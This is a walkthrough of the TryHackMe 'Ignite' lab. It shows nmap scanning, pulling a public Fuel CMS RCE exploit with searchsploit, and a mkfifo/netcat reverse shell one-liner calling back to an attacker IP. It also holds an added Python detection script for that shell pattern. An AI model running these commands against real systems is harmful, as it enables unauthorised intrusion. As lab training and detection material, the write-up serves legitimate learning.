June 12, 2026
TryHackMe Ignite Walkthrough
ibr_yzr
Introduction
Ignite is an easy-rated TryHackMe room designed to introduce penetration testers to web application exploitation and Linux privilege escalation.
This room is ideal for beginners who want hands-on experience with enumeration, vulnerability assessment, exploitation, and post-exploitation techniques commonly encountered during real-world penetration tests.
Initial Reconnaissance
The first step was identifying the services exposed by the target machine. I performed a comprehensive Nmap scan to discover open ports, service versions, and potential vulnerabilities.
The scan revealed an Apache web server running on port 80, indicating that the attack surface would likely involve a web application.
→ nmap -A -T4 -O -sC -sV -p- (Target IP)
→ sudo nmap -v -A -sC --script vuln -p- (TARGETIP)
During enumeration, I discovered that the website was powered by Fuel CMS. Identifying the exact CMS version is important because outdated versions often contain publicly known vulnerabilities. Using publicly available vulnerability databases and Searchsploit, I located an exploit that targets a Remote Code Execution (RCE) vulnerability. This vulnerability allows an attacker to execute commands on the server without valid credentials.
→ searchsploit Fuel
→ searchsploit -m 50477
After confirming the vulnerability, I used the exploit to obtain command execution on the target machine.
To make interaction with the target easier, I established a reverse shell connection back to my attacking machine. This provided an interactive shell running under the web server account.
→ sudo python3 /root/50477.py -u http://TARGETIP
In another terminal, start a listener:
→ nc -lnvp 4242
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.3.49 4242 >/tmp/f
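A detection-side view of the shell step above, as an added example that is not part of the original walkthrough: it flags process-execution records in which a web server account runs a command combining a named pipe, an interactive shell and a netcat client. The log format, the account names and the sample records are constructed for illustration.

```python
import re

# Assumption: accounts the web server runs as on the monitored host.
WEB_ACCOUNTS = {"www-data", "apache", "nginx"}

# Constructed process-execution records in a hypothetical
# "<timestamp> user=<u> parent=<p> cmd=<command line>" format.
SAMPLE_EVENTS = [
    "2026-06-12T10:01:07Z user=www-data parent=apache2 cmd=php /var/www/html/index.php",
    "2026-06-12T10:02:41Z user=www-data parent=apache2 cmd=sh -c rm -f /tmp/f;"
    "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4242 >/tmp/f",
    "2026-06-12T10:03:02Z user=backup parent=cron cmd=mkfifo /var/run/backup.pipe",
    "2026-06-12T10:04:15Z user=www-data parent=apache2 cmd=/bin/sh -i",
]

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$"
)

# Building blocks of a named-pipe shell; each one alone can be benign.
INDICATORS = {
    "named_pipe": re.compile(r"\bmkfifo\s+/(tmp|dev/shm|var/tmp)/"),
    "interactive_shell": re.compile(r"(^|[\s/|;])(ba|da)?sh\s+-i\b"),
    "netcat_client": re.compile(
        r"\b(nc|ncat|netcat)\s+(-\S+\s+)*\d{1,3}(\.\d{1,3}){3}\s+\d+"
    ),
}


def analyse(line):
    """Return a finding dict for a suspicious record, or None."""
    m = EVENT_RE.match(line)
    if not m or m["user"] not in WEB_ACCOUNTS:
        return None
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(m["cmd"]))
    if not hits:
        return None
    # Two or more building blocks under a web account is the full pattern.
    severity = "high" if len(hits) >= 2 else "medium"
    return {"ts": m["ts"], "user": m["user"], "parent": m["parent"],
            "severity": severity, "indicators": hits}


def detect(lines):
    """Analyse every record and keep only the findings."""
    return [f for f in map(analyse, lines) if f]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

In practice the same rule is fed from auditd `execve` records or an EDR process feed instead of the constructed lines.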
Post-Exploitation Enumeration
Once inside the system, I began searching for configuration files, credentials, and sensitive information.
Web application configuration files often contain database passwords, API keys, or administrator credentials. Careful inspection of these files revealed valuable information that could be leveraged later in the attack.
Privilege Escalation
During enumeration, I discovered credentials stored within application configuration files.
The recovered password was reused by a privileged account on the system. Using these credentials, I was able to switch users and obtain elevated privileges.
This demonstrates a common real-world security issue: password reuse across multiple services.
Capturing the Flags
With root-level access obtained, I successfully captured the user and root flags, completing the room.
The challenge highlights the importance of proper patch management, secure credential storage, and avoiding password reuse across systems.
- Enumeration is the foundation of every penetration test.
- Software version disclosure can lead directly to known vulnerabilities.
- Public exploits should always be validated and understood before use.
- Configuration files frequently contain sensitive information.
- Password reuse remains one of the most common privilege escalation vectors.
- Thorough post-exploitation enumeration is often more important than the initial exploit itself.
Thank you